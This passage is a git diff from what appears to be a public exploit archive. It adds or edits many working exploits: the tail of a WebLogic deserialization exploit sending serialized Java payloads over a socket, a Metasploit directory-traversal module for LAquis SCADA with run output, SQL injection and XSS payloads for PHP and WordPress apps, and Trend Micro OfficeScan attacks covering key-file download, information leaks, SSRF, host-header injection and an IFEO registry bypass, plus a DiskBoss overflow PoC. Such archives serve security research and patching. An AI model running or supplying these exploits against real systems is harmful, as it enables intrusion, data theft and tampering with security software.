61\x6c\x2e\x50\x61\x63\x6b\x61\x67\x65\x49\x6e\x66\x6f\xe6\xf7\x23\xe7\xb8\xae\x1e\xc9\x02\x00\x09\x49\x00\x05\x6d\x61\x6a\x6f\x72\x49\x00\x05\x6d\x69\x6e\x6f\x72\x49\x00\x0b\x70\x61\x74\x63\x68\x55\x70\x64\x61\x74\x65\x49\x00\x0c\x72\x6f\x6c\x6c\x69\x6e\x67\x50\x61\x74\x63\x68\x49\x00\x0b\x73\x65\x72\x76\x69\x63\x65\x50\x61\x63\x6b\x5a\x00\x0e\x74\x65\x6d\x70\x6f\x72\x61\x72\x79\x50\x61\x74\x63\x68\x4c\x00\x09\x69\x6d\x70\x6c\x54\x69\x74\x6c\x65\x71\x00\x7e\x00\x05\x4c\x00\x0a\x69\x6d\x70\x6c\x56\x65\x6e\x64\x6f\x72\x71\x00\x7e\x00\x05\x4c\x00\x0b\x69\x6d\x70\x6c\x56\x65\x72\x73\x69\x6f\x6e\x71\x00\x7e\x00\x05\x78\x70\x77\x02\x00\x00\x78\xfe\x00\xff\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x13\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x4a\x56\x4d\x49\x44\xdc\x49\xc2\x3e\xde\x12\x1e\x2a\x0c\x00\x00\x78\x70\x77\x46\x21\x00\x00\x00\x00\x00\x00\x00\x00\x00\x09\x31\x32\x37\x2e\x30\x2e\x31\x2e\x31\x00\x0b\x75\x73\x2d\x6c\x2d\x62\x72\x65\x65\x6e\x73\xa5\x3c\xaf\xf1\x00\x00\x00\x07\x00\x00\x1b\x59\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\x00\x78\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x13\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x4a\x56\x4d\x49\x44\xdc\x49\xc2\x3e\xde\x12\x1e\x2a\x0c\x00\x00\x78\x70\x77\x1d\x01\x81\x40\x12\x81\x34\xbf\x42\x76\x00\x09\x31\x32\x37\x2e\x30\x2e\x31\x2e\x31\xa5\x3c\xaf\xf1\x00\x00\x00\x00\x00\x78' + +totallength = len(chunk1) + len(chunk2) + len(chunk3) +print "[+]TOTAL payload length: ", totallength + +#Update the TOTAL payload length in Chunk1 +len_hex = hex(totallength) +print "[+]Payload length in HEX: ", len_hex +len_hex = len_hex.replace('0x', '0') +print "[+]Payload length in HEX: " , len_hex + +s1 = len_hex[:2] +s2 = len_hex[2:4] +len_hex = unhexlify(s1 + s2) + +print "[+]Payload length in HEX now: ", len_hex + +#Update TOTAL payload length in 'chunk1' (first four bytes) on the fly if user decides to use his own ysoserial payload(Chunk2) +print "[+]Updating Chunk1 according to the TOTAL payload length..." + +chunk1 = '\x00\x00' + len_hex + '\x01\x65\x01\xff\xff\xff\xff\xff\xff\xff\xff\x00\x00\x00\x71\x00\x00\xea\x60\x00\x00\x00\x18\x43\x2e\xc6\xa2\xa6\x39\x85\xb5\xaf\x7d\x63\xe6\x43\x83\xf4\x2a\x6d\x92\xc9\xe9\xaf\x0f\x94\x72\x02\x79\x73\x72\x00\x78\x72\x01\x78\x72\x02\x78\x70\x00\x00\x00\x0c\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x70\x70\x70\x70\x70\x70\x00\x00\x00\x0c\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x70\x06\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x1d\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x43\x6c\x61\x73\x73\x54\x61\x62\x6c\x65\x45\x6e\x74\x72\x79\x2f\x52\x65\x81\x57\xf4\xf9\xed\x0c\x00\x00\x78\x70\x72\x00\x24\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x50\x61\x63\x6b\x61\x67\x65\x49\x6e\x66\x6f\xe6\xf7\x23\xe7\xb8\xae\x1e\xc9\x02\x00\x09\x49\x00\x05\x6d\x61\x6a\x6f\x72\x49\x00\x05\x6d\x69\x6e\x6f\x72\x49\x00\x0b\x70\x61\x74\x63\x68\x55\x70\x64\x61\x74\x65\x49\x00\x0c\x72\x6f\x6c\x6c\x69\x6e\x67\x50\x61\x74\x63\x68\x49\x00\x0b\x73\x65\x72\x76\x69\x63\x65\x50\x61\x63\x6b\x5a\x00\x0e\x74\x65\x6d\x70\x6f\x72\x61\x72\x79\x50\x61\x74\x63\x68\x4c\x00\x09\x69\x6d\x70\x6c\x54\x69\x74\x6c\x65\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x4c\x00\x0a\x69\x6d\x70\x6c\x56\x65\x6e\x64\x6f\x72\x71\x00\x7e\x00\x03\x4c\x00\x0b\x69\x6d\x70\x6c\x56\x65\x72\x73\x69\x6f\x6e\x71\x00\x7e\x00\x03\x78\x70\x77\x02\x00\x00\x78\xfe\x01\x00\x00' + +#print "[+]Updated 'chunk1' : \n", chunk1 + +#Get the final payload. This should have appropriate TOTAL payload lenght in 'chunk1' +payload = chunk1 + chunk2 + chunk3 + +#Adjust header for appropriate message length +payload = "{0}{1}".format(struct.pack('!i', len(payload)), payload[4:]) +print '[+]Sending payload...' +sock.send(payload) + +print "[+]Done! You should see ICMP ECHO requests from your target to your attacking machine!!" +print("\n[+]Response to Request#: \n") +response = sock.recv(15000) +print(response) + diff --git a/platforms/linux/remote/41910.sh b/platforms/linux/remote/41910.sh index 6de4e57e0..b7c340c52 100755 --- a/platforms/linux/remote/41910.sh +++ b/platforms/linux/remote/41910.sh @@ -8,9 +8,9 @@ int='\033[94m /_____/\___/\__, /\__,_/_/ /_/ /_/\__,_/\___/_/|_|\___/_/ /____/ /____/ -SquirrelMail <= 1.4.22 Remote Code Execution PoC Exploit (CVE-2017-7692) +SquirrelMail <= 1.4.23 Remote Code Execution PoC Exploit (CVE-2017-7692) -SquirrelMail_RCE_exploit.sh (ver. 1.0) +SquirrelMail_RCE_exploit.sh (ver. 1.1) Discovered and coded by @@ -190,4 +190,5 @@ fi # Done -echo -e "\n[*] All done. Exiting" \ No newline at end of file +echo -e "\n[*] All done. Exiting" + diff --git a/platforms/multiple/remote/42885.rb b/platforms/multiple/remote/42885.rb new file mode 100755 index 000000000..6a1c65947 --- /dev/null +++ b/platforms/multiple/remote/42885.rb @@ -0,0 +1,185 @@ +require 'msf/core' + +class MetasploitModule < Msf::Auxiliary + Rank = GreatRanking + + include Msf::Exploit::Remote::HttpClient + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'LAquis SCADA Web Server Directory Traversal Information Disclosure', + 'Description' => %q{ + This module exploits a directory traversal vulnerability found in the LAquis SCADA + application. The vulnerability is triggered when sending a series of dot dot slashes + (../) to the vulnerable NOME parameter found on the listagem.laquis file. + + This module was tested against v4.1.0.2385 + }, + 'Author' => [ 'james fitts' ], + 'License' => MSF_LICENSE, + 'References' => + [ + [ 'CVE', '2017-6020' ], + [ 'ZDI', '17-286' ], + [ 'BID', '97055' ], + [ 'URL', 'https://ics-cert.us-cert.gov/advisories/ICSA-17-082-01' ] + ], + 'DisclosureDate' => 'Mar 29 2017')) + + register_options( + [ + OptInt.new('DEPTH', [ false, 'Levels to reach base directory', 10]), + OptString.new('FILE', [ false, 'This is the file to download', 'boot.ini']), + Opt::RPORT(1234) + ], self.class ) + end + + def run + + depth = (datastore['DEPTH'].nil? or datastore['DEPTH'] == 0) ? 10 : datastore['DEPTH'] + levels = "/" + ("../" * depth) + + res = send_request_raw({ + 'method' => 'GET', + 'uri' => '/' + }) + + # make sure the webserver is actually listening + if res.code == 200 + blob = res.body.to_s.scan(/(?<=href=)[A-Za-z0-9.?=&+]+/) + + for url in blob + if url =~ /listagem/ + listagem = url + end + end + + # make sure the vulnerable page is there + # not all of the examples include the + # vulnerable page, so we test to ensure + # that it is there prior to executing our code + # there is a potential that real world may not + # include the vulnerable page in some cases + # as well + res = send_request_raw({ + 'method' => 'GET', + 'uri' => "/#{listagem}", + }) + + # trigger + if res.code == 200 and res.body.to_s =~ /Listagem<\/title><\/head>/ + + loot = [] + file_path = "#{datastore['FILE']}" + file_path = file_path.gsub(/\//, "\\") + cleanup = "#{listagem}" + cleanup = cleanup.gsub(/DATA=/, "DATA=#{Rex::Text.rand_text_alphanumeric(15)}") + cleanup = cleanup.gsub(/botao=Enviar\+consulta/, "botao=Submit\+Query") + vulnerability = listagem.gsub(/(?<=NOME=)[A-Za-z0-9.]+/, "#{levels}#{file_path}") + + res = send_request_raw({ + 'method' => 'GET', + 'uri' => "/#{vulnerability}" + }) + + if res and res.code == 200 + blob = res.body.to_s + blob.each_line do |line| + loot << line.match(/.* <\/font><\/td>.*$/) + end + + loot = loot.join.gsub(/ <\/font><\/td>/, "\r\n") + + if not loot or loot.empty? + print_status("File from \'#{rhost}:#{rport}\' is empty...") + return + end + file = ::File.basename(datastore['FILE']) + path = store_loot('laquis.file', 'application/octet-stream', rhost, loot, file, datastore['FILE']) + print_status("Stored \'#{datastore['FILE']}\' to \'#{path}\'") + + # cleaning up afterwards because the response + # data from before is written and becomes + # persistent + referer = cleanup.gsub(/DATA=[A-Za-z0-9]+/, "DATA=") + + res = send_request_raw({ + 'method' => 'GET', + 'uri' => "/#{listagem}" + }) + + if res.code == 200 + nome = res.body.to_s.match(/(?<=<input type=hidden name=NOME value=")[A-Za-z0-9.]+/) + cleanup = cleanup.gsub(/(?<=NOME=)[A-Za-z0-9.]+/, "#{nome}") + res = send_request_raw({ + 'method' => 'GET', + 'uri' => "/#{cleanup}", + 'headers' => { + 'Referer' => "http://#{rhost}:#{rport}/#{referer}", + 'Accept-Language' => 'en-US,en;q=0.5', + 'Accept-Encoding' => 'gzip, deflate', + 'Connection' => 'close', + 'Upgrade-Insecure-Requests' => '1', + 'Cache-Control' => 'max-age=0' + } + }) + end + + return + + end + + else + print_error("Vulnerable page does not exist...") + end + + else + print_error("The server does not appear to be listening...") + end + + end +end +__END__ +msf auxiliary(laquis_directory_traversal) > show options + +Module options (auxiliary/server/laquis_directory_traversal): + + Name Current Setting Required Description + ---- --------------- -------- ----------- + DEPTH 10 no Levels to reach base directory + FILE Windows/System32/drivers/etc/hosts no This is the file to download + Proxies no A proxy chain of format type:host:port[,type:host:port][...] + RHOST 192.168.1.2 yes The target address + RPORT 1234 yes The target port (TCP) + SSL false no Negotiate SSL/TLS for outgoing connections + VHOST no HTTP server virtual host + +msf auxiliary(laquis_directory_traversal) > rexploit +[*] Reloading module... + +[*] Stored 'Windows/System32/drivers/etc/hosts' to '/home/james/.msf4/loot/20170927110756_default_192.168.1.2_laquis.file_227964.bin' +[*] Auxiliary module execution completed + +james@bloop:~/.msf4/loot$ cat 20170927110456_default_192.168.1.2_laquis.file_677204.bin +# Copyright (c) 1993-2009 Microsoft Corp. +# +# This is a sample HOSTS file used by Microsoft TCP/IP for Windows. +# +# This file contains the mappings of IP addresses to host names. Each +# entry should be kept on an individual line. The IP address should +# be placed in the first column followed by the corresponding host name. +# The IP address and the host name should be separated by at least one +# space. +# +# Additionally, comments (such as these) may be inserted on individual +# lines or following the machine name denoted by a '#' symbol. +# +# For example: +# +# 102.54.94.97 rhino.acme.com # source server +# 38.25.63.10 x.acme.com # x client host + +# localhost name resolution is handled within DNS itself. +# +# + diff --git a/platforms/php/webapps/42380.txt b/platforms/php/webapps/42380.txt new file mode 100755 index 000000000..6bebdae31 --- /dev/null +++ b/platforms/php/webapps/42380.txt @@ -0,0 +1,46 @@ +# Exploit Title: Ads Pro Plugin - Multi-Purpose WordPress Advertising Manager <= v3.4 - Stored XSS / SQLi +# Date: 2017-07-25 +# Exploit Author: 8bitsec +# Vendor Homepage: http://adspro.scripteo.info/ +# Software Link: https://codecanyon.net/item/ads-pro-plugin-multipurpose-wordpress-advertising-manager/10275010 +# Version: 3.4 +# Tested on: [Kali Linux 2.0 | Mac OS 10.12.6] +# Email: contact@8bitsec.io +# Contact: https://twitter.com/_8bitsec + +Release Date: +============= +2017-07-25 + +Product & Service Introduction: +=============================== +Ads Pro is a Premium WordPress Ad Plugin that helps you manage, sell and display your advertising space, in a way that no other plugin can. + +Technical Details & Description: +================================ + +Multiple Stored XSS vulnerabilities found. + +Blind SQL Injection on bsa_pro_id parameter. + +Proof of Concept (PoC): +======================= + +Stored XSS: + +On the Front End Order Form the Ad Title and Ad Description parameters are vulnerable. The payload will execute when the ad is displayed. + +Blind SQL Injection: + +Parameter: bsa_pro_id (GET) + Type: boolean-based blind + Title: AND boolean-based blind - WHERE or HAVING clause + Payload: bsa_pro_stats=1&bsa_pro_email=some@email.com&bsa_pro_id=xx AND 1707=1707 + + Type: AND/OR time-based blind + Title: MySQL >= 5.0.12 AND time-based blind + Payload: bsa_pro_stats=1&bsa_pro_email=some@email.com&bsa_pro_id=xx AND SLEEP(5) + +Credits & Authors: +================== +8bitsec - [https://twitter.com/_8bitsec] \ No newline at end of file diff --git a/platforms/php/webapps/42889.txt b/platforms/php/webapps/42889.txt new file mode 100755 index 000000000..ca7f99ee7 --- /dev/null +++ b/platforms/php/webapps/42889.txt @@ -0,0 +1,113 @@ +[+] Credits: John Page (aka hyp3rlinx) +[+] Website: hyp3rlinx.altervista.org +[+] Source: http://hyp3rlinx.altervista.org/advisories/CVE-2017-14083-TRENDMICRO-OFFICESCAN-XG-PRE-AUTH-REMOTE-ENCRYPTION-KEY-DISCLOSURE.txt +[+] ISR: ApparitionSec + + + +Vendor: +================== +www.trendmicro.com + + + +Product: +======== +OfficeScan +v11.0 and XG (12.0)* + + +OfficeScan protects enterprise networks from malware, network viruses, web-based threats, spyware, and mixed threat attacks. +An integrated solution, OfficeScan consists of the OfficeScan agent program that resides at the endpoint and a server program that +manages all agents. The OfficeScan agent guards the endpoint and reports its security status to the server. The server, through the +web-based management console, makes it easy to set coordinated security policies and deploy updates to every agent. + + + +Vulnerability Type: +=================== +Unauthorized Encryption Key Disclosure + + + +CVE Reference: +============== +CVE-2017-14083 + + + +Security Issue: +================ +Remote unauthenticated attackers who can reach the TrendMicro OfficeScan XG application which usually runs on port 4343 can download +the OfficeScan XG encryption "crypt.key" file. This crypt.key is used for the OfficeScan XG encryption process. + + +References: +=========== +https://success.trendmicro.com/solution/1118372 + + +e.g. + +In "config.php" + +/* ********************************************************* + * Encryption module configurations + */ +$wfconf_wfcrypt_keyfile = dirname(__FILE__) . "/../repository/inc/class/common/crypt/crypt.key"; <============= HERE +$wfconf_wfcrypt_algorithm = MCRYPT_RIJNDAEL_256; // MCRYPT_3DES MCRYPT_BLOWFISH MCRYPT_CAST_256 MCRYPT_DES ... +/* ********************************************************* + * Framework configurations + */ + + + +Exploit/POC: +============= + +[root@localhost /]# wget --no-check-certificate https://VICTIM-IP:4343/officescan/console/html/widget/repository/inc/class/common/crypt/crypt.key +--14:59:52-- https://VICTIM-IP:4343/officescan/console/html/widget/repository/inc/class/common/crypt/crypt.key +Connecting to VICTIM-IP:4343... connected. +WARNING: cannot verify VICTIM-IP's certificate, issued by `/CN=VICTIM-IP': + Self-signed certificate encountered. +HTTP request sent, awaiting response... 200 OK +Length: 32 [application/octet-stream] +Saving to: `crypt.key' + +100%[==================================================================================================>] 32 --.-K/s in 0s + +14:59:52 (15.3 MB/s) - `crypt.key' saved [32/32] + + + +Network Access: +=============== +Remote + + + + +Severity: +========= +High + + + +Disclosure Timeline: +================================= +Vendor Notification: May 31, 2017 +Vendor: "hotfix in progress". June 23, 2017 +Vendor releases fixes / advisory : September 27, 2017 +September 28, 2017 : Public Disclosure + + + +[+] Disclaimer +The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. +Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and +that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit +is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility +for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information +or exploits by the author or elsewhere. All content (c). + +hyp3rlinx \ No newline at end of file diff --git a/platforms/php/webapps/42893.txt b/platforms/php/webapps/42893.txt new file mode 100755 index 000000000..b4d575352 --- /dev/null +++ b/platforms/php/webapps/42893.txt @@ -0,0 +1,162 @@ +[+] Credits: John Page (aka hyp3rlinx) +[+] Website: hyp3rlinx.altervista.org +[+] Source: http://hyp3rlinx.altervista.org/advisories/CVE-2017-14085-TRENDMICRO-OFFICESCAN-XG-REMOTE-NT-DOMAIN-PHP-INFO-DISCLOSURE.txt +[+] ISR: ApparitionSec + + + +Vendor: +================== +www.trendmicro.com + + + +Product: +=========== +OfficeScan +v11.0 and XG (12.0)* + + +Vulnerability Type: +=================== +Unauthorized NT Domain Disclosure +Unauthorized PHP Information Disclosure + +OfficeScan protects enterprise networks from malware, network viruses, web-based threats, spyware, and mixed threat attacks. +An integrated solution, OfficeScan consists of the OfficeScan agent program that resides at the endpoint and a server program that +manages all agents. The OfficeScan agent guards the endpoint and reports its security status to the server. The server, through the +web-based management console, makes it easy to set coordinated security policies and deploy updates to every agent. + + + +CVE Reference: +============== +CVE-2017-14085 + + + +Security Issue(s): +================ +( NT Domain Disclosure ) +Remote unauthenticated attackers who reach the TrendMicro OfficeScan XG application can query the networks NT domains. +NT enumeration is leaked by the web interface when it should not do so. Usually, you use NET commands so while this NT enumeration +is not high in severity, it should not return this information and especially to unauthorized users as it can aid in launching +further attacks. + + +( PHP Information Disclosure ) +Remote unauthenticated attackers that can connect to TrendMicro OfficeScan XG application can query the PHP version and modules. + +In 'analyzeWF.php" we see get_loaded_extensions() and phpversion() calls, but session or authentication check is made. + +$strAnalyzeResultHeader .= analyzeWFShowItemInfo('Current PHP version: '.phpversion()); +$strAnalyzeResultHeader .= analyzeWFShowItemInfo('PHP extensions: '.implode(', ',get_loaded_extensions())); +$strAnalyzeResultHeader .= analyzeWFShowItemInfo('WGF version : '.$strVersion); + +etc... + + +References: +=========== +https://success.trendmicro.com/solution/1118372 + + + +Exploit/POC (NT Domain Disclosure): +===================================== +[root@localhost /]# curl -v -k https://VICTIM-IP:4343/officescan/console/RemoteInstallCGI/cgiGetNTDomain.exe +* About to connect() to VICTIM-IP port 4343 +* Trying VICTIM-IP... connected + + +< HTTP/1.1 200 OK +< Pragma: no-cache +< Content-Type: text/plain;charset=utf-8 +< Server: Microsoft-IIS/7.5 +< X-Powered-By: ASP.NET +< Date: Thu, 01 Jun 2017 15:27:27 GMT +< Connection: close +< Content-Length: 510 +{ + "ERROR" : { + "ERROR_CODE" : 0 + }, + "RESPONSE" : { + "NODES" : [ + { + "NAME" : "Avaya" + }, + { + "NAME" : "Km-netprinters" + }, + { + "NAME" : "Mshome" + }, + { + "NAME" : "Printserver" + }, + { + "NAME" : "MyDomain" + }, + { + "NAME" : "Workgroup" + }, + { + "NAME" : "Xpemb" + } + ] + } +} + + +Exploit / POC (PHP Information Disclosure): +============================================ +c:\> curl -k https://VICTIM-IP:4343/officescan/console/html/widget/repository/widgetPool/wp1/interface/analyzeWF.php + +HTTP/1.1 200 OK + +[INI_UPDATE_SECTION] + +>>>> Start Anaylze WGF : 2017-06-02 15:58:26 +[INFO] Current PHP version: 7.0.6 +[INFO] PHP extensions: Core, bcmath, calendar, ctype, date, filter, hash, iconv, json, mcrypt, SPL, pcre, Reflection, session, standard, mysqlnd, tokenizer, zip, zlib, libxml, dom, PDO, openssl, SimpleXML, xml, wddx, xmlreader, xmlwriter, cgi-fcgi, curl, gmp, ldap, mbstring, Phar, pdo_sqlite, soap, com_dotnet +[INFO] WGF version : 3.8 +[INFO] WGF current wp in /path/to/widgetPool/config.php : wp2 +[INFO] WGF is /path/to/widgets_new exists : true +[ERROR] C:\Windows\TEMP check read/write permissions : failed +To solved this problem please reference document here. + +etc... + + + +Network Access: +=============== +Remote + + + + +Severity: +========= +Medium + + + +Disclosure Timeline: +===================== +Vendor Notification: June 2, 2017 +Vendor releases fixes / advisory : September 27, 2017 +September 28, 2017 : Public Disclosure + + + +[+] Disclaimer +The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. +Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and +that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit +is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility +for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information +or exploits by the author or elsewhere. All content (c). + +hyp3rlinx \ No newline at end of file diff --git a/platforms/php/webapps/42894.txt b/platforms/php/webapps/42894.txt new file mode 100755 index 000000000..3bb0147c5 --- /dev/null +++ b/platforms/php/webapps/42894.txt @@ -0,0 +1,89 @@ +[+] Credits: John Page (aka hyp3rlinx) +[+] Website: hyp3rlinx.altervista.org +[+] Source: http://hyp3rlinx.altervista.org/advisories/TRENDMICRO-OFFICESCAN-XG-SERVER-SIDE-REQUEST-FORGERY.txt +[+] ISR: ApparitionSec + + + +Vendor: +================== +www.trendmicro.com + + + +Product: +=========== +OfficeScan +v11.0 and XG (12.0)* + + +OfficeScan protects enterprise networks from malware, network viruses, web-based threats, spyware, and mixed threat attacks. +An integrated solution, OfficeScan consists of the OfficeScan agent program that resides at the endpoint and a server program that +manages all agents. The OfficeScan agent guards the endpoint and reports its security status to the server. The server, through the +web-based management console, makes it easy to set coordinated security policies and deploy updates to every agent. + + + +Vulnerability Type: +=================== +Unautherized Server Side Request Forgery + + + +CVE Reference: +============== +N/A + + + +Security Issue: +================ +Unauthorized LAN attackers that can reach the OfficeScan XG application can make arbitrary HTTP requests to external and internal servers. +Abusing a Server Side Request Forgery flaw in the "help_Proxy.php" functionality. + + + + +Exploit/POC: +============= +https://VICTIM-IP:4343/officescan/console/html/Widget/help_proxy.php?url=http://<REQUESTED-IP>:8080 + +python -m SimpleHTTPServer 8080 +Serving HTTP on 0.0.0.0 port 8080 ... + +<REQUESTED-IP> - - [31/May/2017 12:21:41] "GET / HTTP/1.1" 200 - + +help_proxy.php HTTP response: +{"request_url":"http:\/\/<REQUESTED-IP>:8080","http_code":200,"flag":1} + + +Network Access: +=============== +Remote + + + +Severity: +========= +Medium + + + +Disclosure Timeline: +============================= +Vendor Notification: May 31, 2017 +Vendor reply: "We confirmed that this is a valid vulnerability. We are now working on a hotfix to remediate the issue." : June 30, 2017 +Vendor releases fixes / advisory : September 27, 2017 +September 28, 2017 : Public Disclosure + + + +[+] Disclaimer +The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. +Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and +that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit +is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility +for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information +or exploits by the author or elsewhere. All content (c). + +hyp3rlinx \ No newline at end of file diff --git a/platforms/php/webapps/42895.txt b/platforms/php/webapps/42895.txt new file mode 100755 index 000000000..ca1efe018 --- /dev/null +++ b/platforms/php/webapps/42895.txt @@ -0,0 +1,82 @@ +[+] Credits: John Page (aka hyp3rlinx) +[+] Website: hyp3rlinx.altervista.org +[+] Source: http://hyp3rlinx.altervista.org/advisories/CVE-2017-14087-TRENDMICRO-OFFICESCAN-XG-HOST-HEADER-INJECTION.txt +[+] ISR: ApparitionSec + + + +Vendor: +================== +www.trendmicro.com + + + +Product: +======== +OfficeScan +v11.0 and XG (12.0)* + + +OfficeScan protects enterprise networks from malware, network viruses, web-based threats, spyware, and mixed threat attacks. +An integrated solution, OfficeScan consists of the OfficeScan agent program that resides at the endpoint and a server program that +manages all agents. The OfficeScan agent guards the endpoint and reports its security status to the server. The server, through the +web-based management console, makes it easy to set coordinated security policies and deploy updates to every agent. + + + +Vulnerability Type: +=================== +Host Header Injection + + + +CVE Reference: +============== +CVE-2017-14087 + + + +Security Issue: +================ +Host header injection issue as "db_controller.php" relies on $_SERVER['HTTP_HOST'] which can be spoofed by client, instead of $_SERVER['SERVER_NAME']. +In environments where caching is in place by making HTTP GET request with a poisoned HOST header webpages can potentially render arbitrary +links that point to a malicious website. + + +Exploit/POC: +============= + +c:\> CURL http://x.x.x.x -H "Host: ATTACKER-IP" + + + +Network Access: +=============== +Remote + + + + +Severity: +========= +Medium + + + +Disclosure Timeline: +================================== +Vendor Notification: June 2, 2017 +Vendor releases fixes / advisory : September 27, 2017 +September 28, 2017 : Public Disclosure + + + +[+] Disclaimer +The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. +Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and +that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit +is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility +for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information +or exploits by the author or elsewhere. All content (c). + +hyp3rlinx \ No newline at end of file diff --git a/platforms/php/webapps/42919.txt b/platforms/php/webapps/42919.txt new file mode 100755 index 000000000..8f5940181 --- /dev/null +++ b/platforms/php/webapps/42919.txt @@ -0,0 +1,37 @@ +# Exploit Title: Easy Blog PHP Script v1.3a - SQL Injection +# Date: 2017-09-27 +# Exploit Author: 8bitsec +# Vendor Homepage: https://www.codester.com/ +# Software Link: https://www.codester.com/items/4616/easy-blog-php-script +# Version: 1.3a +# Tested on: [Kali Linux 2.0 | Mac OS 10.12.6] +# Email: contact@8bitsec.io +# Contact: https://twitter.com/_8bitsec + +Release Date: +============= +2017-09-27 + +Product & Service Introduction: +=============================== +A simple and easy to setup script that allows you to have your own basic blog that comes packed with professional features. + +Technical Details & Description: +================================ + +SQL injection on [id] parameter. + +Proof of Concept (PoC): +======================= + +SQLi: + +http://localhost/[path]/article.php?id=8' AND 7160=7160 AND 'cbgz'='cbgz + +Parameter: id (GET) + Type: boolean-based blind + Title: AND boolean-based blind - WHERE or HAVING clause + Payload: id=8' AND 7160=7160 AND 'cbgz'='cbgz + +================== +8bitsec - [https://twitter.com/_8bitsec] \ No newline at end of file diff --git a/platforms/windows/dos/42917.py b/platforms/windows/dos/42917.py new file mode 100755 index 000000000..d2a320152 --- /dev/null +++ b/platforms/windows/dos/42917.py @@ -0,0 +1,32 @@ +#!/usr/bin/python + +#======================================================================================================================== +# Exploit Author: Touhid M.Shaikh +# Exploit Title: DiskBoss Enterprise v8.4.16 Local Buffer Overflow(PoC) +# Date: 28-09-2017 +# Website: www.touhidshaikh.com +# Vulnerable Software: DiskBoss Enterprise v8.4.16 +# Vendor Homepage: http://www.diskboss.com +# Version: v8.4.16 +# Software Link: http://www.diskboss.com/downloads.html +# Tested On: Windows 7 x86 +# +# +# To reproduce the exploit: +# 1. Click Server +# 2. Click Connect +# 3. In the "Share Name" field, paste the content of buffer.txt , And try +to connect.........BOOoom.... +# +#======================================================================================================================== + + +junk = "A"*1312 + +EIP = "B"*4 #EIP overwritten + +b = junk+EIP+"D"*500 + +f = open('buffer.txt','w') +f.write(b) +f.close() diff --git a/platforms/windows/local/42890.txt b/platforms/windows/local/42890.txt new file mode 100755 index 000000000..b8d8b10dd --- /dev/null +++ b/platforms/windows/local/42890.txt @@ -0,0 +1,113 @@ +[+] Credits: John Page (aka hyp3rlinx) +[+] Website: hyp3rlinx.altervista.org +[+] Source: http://hyp3rlinx.altervista.org/advisories/TRENDMICRO-OFFICESCAN-XG-IMAGE-FILE-EXECUTION-BYPASS.txt +[+] ISR: ApparitionSec + + + +Vendor: +================== +www.trendmicro.com + + + +Product: +======== +OfficeScan +v11.0 and XG (12.0)* + + +OfficeScan protects enterprise networks from malware, network viruses, web-based threats, spyware, and mixed threat attacks. +An integrated solution, OfficeScan consists of the OfficeScan agent program that resides at the endpoint and a server program that +manages all agents. The OfficeScan agent guards the endpoint and reports its security status to the server. The server, through the +web-based management console, makes it easy to set coordinated security policies and deploy updates to every agent. + + +Vulnerability Type: +=================== +Image File Execution Bypass + + + +CVE Reference: +============== +N/A + + + +Security Issue: +================ +OfficeScan XG "Unauthorized Change Prevention Service" is a Local SYSTEM service that is supposed to protect OfficeScan processes +like "PccNTMon.exe" from being terminated, and also prevents unauthorized arbitrary registry settings being made to the protected +machine even by an Administrator. + +However, we can easily bypass by exploiting Windows Image File Execution Options (IFEO) to hijack the service process. +IFEO has been used by malwares for some time to prevent process from running or execute a process of an attackers choosing in +place of the process the user expects. + +HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options + +All an attacker needs to do is create a registry key in IFEO with the same name as "TMBMSRV.exe" which is used by the +"Trend Micro Unauthorized Change Prevention Service" SYSTEM service. After creating this registry key we create a "string value" +named debugger pointing to say "calc.exe", we wait and once system reboots BOOM! + + +References: +=========== +https://success.trendmicro.com/solution/1118372 + + + +Exploit/POC: +============= + +Reproduction: + +1) Open registry + +HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options + +2) Create a new Key with no name + +3) Create a new string value under the new key named "debugger" with value of c:\Windows\system32\calc.exe + +4) Rename the created key to TMBMSRV.exe + +5) Reboot system + +Done! + +We can then not only Kill TM but write to TrendMicro whitelist key in the registry for our evil binary to be left alone in peace. + + + +Network Access: +=============== +Local + + + +Severity: +========= +High + + + +Disclosure Timeline: +================================= +Vendor Notification: June 28, 2017 +Vendor Reply: "Officescan Build 1222 